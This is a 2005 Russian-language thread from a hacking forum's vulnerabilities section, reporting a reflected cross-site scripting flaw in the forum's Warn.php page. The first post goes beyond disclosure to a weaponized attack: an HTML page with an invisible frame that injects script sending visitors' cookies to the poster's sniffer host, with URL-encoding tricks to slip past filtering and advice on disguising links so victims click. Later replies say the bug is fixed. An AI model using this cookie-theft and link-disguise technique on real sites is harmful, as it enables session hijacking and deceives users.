Уязвимость Форум.Античат.Ру (не критическая)

Discussion in 'Уязвимости' started by censored!, 11 May 2005.

  1. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    http://forum.antichat.ru/Warn.php пропускает вхождения

    Пример: http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0"><script>alert(document.cookie);</script>

    Чего делать?
    Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт.
    Вот так выглядит index.html (в примере адрес снифера указан мой):

    HTML:
    <html>
    <head>
    <title>Типа липовый сайт...</title>
    </head>
    <frameset cols="0,*" frameborder="NO" border="0" framespacing="0"> 
      <frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E">
      <frame name="mainFrame" src="main_frame.html">
    </frameset>
    <noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes>
    </html>
    ...
    *
    Так как + (плюсик) вырезается, его заменяем: %2B
    Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем:
    " - %22
    > - %3C
    > - %3E
    ...
    Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал).

    Как пример:
    ...
    !ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР!
    ...
    Всем добро пожаловать на сайт http://forum.antichat.ru
    ...
    © censored!
     
    _________________________
    1 person likes this.
  2. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Нифига себе намутил . А бага то красивая :) Аффтар жжот!!!
     
  3. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Спасибо, исправлено.
     
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    хорошо что исправил а то я по этой ссылке перешел )))
     
  5. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Молодец ... Даю грина )
    Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
     
    #5 Че Гевара, 12 May 2005
    Last edited: 12 May 2005
  6. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Добавление (всегда пригодится):
    url-конвертер брать тут: [*censored*]


    Встречается он не часто, но все-равно встречается.
     
    _________________________
    #6 censored!, 14 May 2005
    Last edited by a moderator: 14 May 2005
  7. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Кстати редкосная фигня....
    Идея хорошая, а реализация - как всегда...
     
  8. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Видимая ссылка на другой ресурс? Оке. Понял. Буду маскировать.
     
    _________________________
  9. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Просто такая же возможность есть в нашем родном InetCrack